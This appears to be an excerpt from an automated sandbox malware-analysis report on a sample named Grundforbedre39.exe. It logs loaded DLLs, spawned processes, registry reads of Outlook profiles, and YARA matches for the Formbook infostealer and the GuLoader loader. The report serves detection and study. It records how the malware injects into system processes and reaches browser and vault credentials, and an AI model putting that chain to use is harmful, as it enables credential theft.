        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DFD274_2_355DFD27
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35529DD04_2_35529DD0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532DB04_2_35532DB0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CEC4C4_2_355CEC4C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D6C694_2_355D6C69
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DEC604_2_355DEC60
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510C124_2_35510C12
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552AC204_2_3552AC20
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35538CDF4_2_35538CDF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35528CE04_2_35528CE0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EACEB4_2_355EACEB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355B9C984_2_355B9C98
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DFF634_2_355DFF63
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D1FC64_2_355D1FC6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35526FE04_2_35526FE0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DEFBF4_2_355DEFBF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540E504_2_35540E50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D9ED24_2_355D9ED2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35512EE84_2_35512EE8
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D43AE89_2_04D43AE8
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D625D79_2_04D625D7
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4589E9_2_04D4589E
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D458A79_2_04D458A7
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4C0759_2_04D4C075
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4C0779_2_04D4C077
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D45AC79_2_04D45AC7
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D43B469_2_04D43B46
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D43B479_2_04D43B47
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: String function: 3550B910 appears 79 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: String function: 35567BE4 appears 60 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: String function: 3559EF10 appears 59 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: String function: 3558E692 appears 65 times
        Source: Grundforbedre39.exeStatic PE information: invalid certificate
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetiougc.exej% vs Grundforbedre39.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: Grundforbedre39.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@60/12
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404579
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402095
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\Pictures\industrialisereJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\AppData\Local\Temp\nsrA1F1.tmpJump to behavior
        Source: Grundforbedre39.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Grundforbedre39.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile read: C:\Users\user\Desktop\Grundforbedre39.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeProcess created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exe
        Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exeJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeProcess created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Grundforbedre39.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: netiougc.pdbGCTL source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, 00000009.00000002.5890904969.0000000000A5E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Grundforbedre39.exe, Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: netiougc.pdb source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.1134826419.000000000785E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D47CDA pushad ; retf 9_2_04D47CDB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D53C09 pushfd ; ret 9_2_04D53C18
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D58D72 push edx; iretd 9_2_04D58D79
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D42D7D push ecx; retf 9_2_04D42D7E
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B6EF push ebp; iretd 9_2_04D3B705
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D63696 push eax; ret 9_2_04D63698
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D59641 push eax; ret 9_2_04D59645
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B70D push ebp; iretd 9_2_04D3B705
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D388F8 push eax; ret 9_2_04D38900
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4D0A7 push edi; iretd 9_2_04D4D0B0
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B971 push ebp; retf 9_2_04D3B976
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4E11B pushfd ; retf 9_2_04D4E133
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D5393A push ds; ret 9_2_04D5393C
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4FBD6 push ebx; retf 9_2_04D4FBEB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4FBF3 push ebx; retf 9_2_04D4FBEB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D393AF push ecx; retf 9_2_04D393B1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
